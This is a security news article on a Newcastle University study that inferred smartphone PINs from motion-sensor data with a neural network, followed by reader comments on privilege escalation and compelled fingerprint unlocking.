The motion sensors embedded in smartphones could offer attackers a way to infer security PINs, researchers at Newcastle University have discovered.
Today’s smartphones come stuffed with these sensors, which range from well-known ones such as GPS, camera, microphone and fingerprint readers, but include also accelerometers, gyroscopes, ambient light sensors, magnetometers, proximity sensors, barometers, thermometers, and air humidity sensors – to name only a few of the estimated 25 in the best-equipped models.
That’s a lot of data for a rogue app or malicious website to aim at, much of which is not covered by any consistent permissions or notifications system.
The Newcastle University study focused on the sensors that record a device’s orientation, motion and rotation which, the team theorised, could be used to reveal specific touch actions.
The methodology involved 10 smartphone users entering 50 four-digit test PINs five times each on a webpage, which provided data to train the neural network used to guess the PINs.
In the event, the network guessed the correct PIN on its first try an impressive 70% of the time. By the fifth guess, the success rate reached 100%.
For comparison, the team reckons a random guess of a four-digit PIN (from 10,000 possibilities) would have a probability of being right only 2% of the time on the first occasion and 6% of the time by guess three.
That’s an impressive guessing rate – so should smartphone users be worried?
In the short term, not really. Training the neural network to reach this level of accuracy required a large amount of training data – 250 PINs per targeted user – on which to base its inferences about which keys individuals had touched.
Gathering each of those PINs could only be achieved under specific conditions, such as if an attacker were running a rogue app or had lured the user to a website running malicious JavaScript code in a tab that remained open while they entered a PIN in another site.
Under real-world conditions this would be pretty hard to pull off. In any case, the team points out, up to a quarter of smartphone users choose PINs from a predictable set of 20 common sequences such as 1234, 0000, or 1000, so advanced neural PIN guessing might be overkill.
What the study tells us is that how someone holds, clicks, scrolls and taps on a smartphone generates data that is not as indecipherable or random as people probably think it is.
Said the study’s lead author, Dr Maryam Mehrnezhad:
We all clamour for the latest phone with the latest features and better user experience but because there is no uniform way of managing sensors across the industry they pose a real threat to our personal security.
One solution would be to extend sensor permissions so that users can see when a malicious site or app is accessing them. But there are now so many of them inside smartphones this might lead to notification overload.
The team’s other suggestions – change PINs regularly, check app permissions before installation, close background tabs and apps – are sound but unlikely to make much impression on the average smartphone user if the history of security advice is anything to go by.
Alternatively, people could simply use longer PINs or, better still, the industry could ditch them altogether (as is being done elsewhere) in favour of better security options. Users like PINs, but as the punchline goes, their days are surely numbered.
Anonymous
I’m sure this is of academic interest, but if some attack program is already running on your device, it probably doesn’t need your PIN.
Paul Ducklin
Yes and no.
The idea here is that you use low-security data that (say) a web page or an already-installed app can access without any special permissions, and use that data to infer high-security data such as a PIN or other password.
Even if you aren’t able to do this with a web page and need to get someone to install your “attack program”, you’re much more likely to persuade them to trust your app if it asks for modest (or no) special permissions.
In particular, it’s always going to be a security vulnerability if an app that explicitly says it won’t access your keyboard, and indeed doesn’t access it directly, can nevertheless figure out what you typed anyway – and without arousing any suspicion.
This is an example of EoP, short for Elevation of Privilege:
https://nakedsecurity.sophos.com/2013/09/18/sophos-techknow-understanding-vulnerabilties-podcast/
jkwilborn
Interesting. I always wonder when they say “better security options” and the link only informs about ditching the IRS system. Nothing about ‘better security options’, which is why I followed the link… :)
In the US, I believe we have a problem as the courts have already ruled that you have ‘no right’ to refuse to be fingerprinted. Saying it’s something like looks or physical properties, you can’t really change them generally. Somewhere between this and DNA availability is the no-warrant/warrant line. This means that my phone access via fingerprint allows them to force me to open it. Or one that uses facial or retina mechanisms. Unless I was to only allow digital (numbers not fingers) access.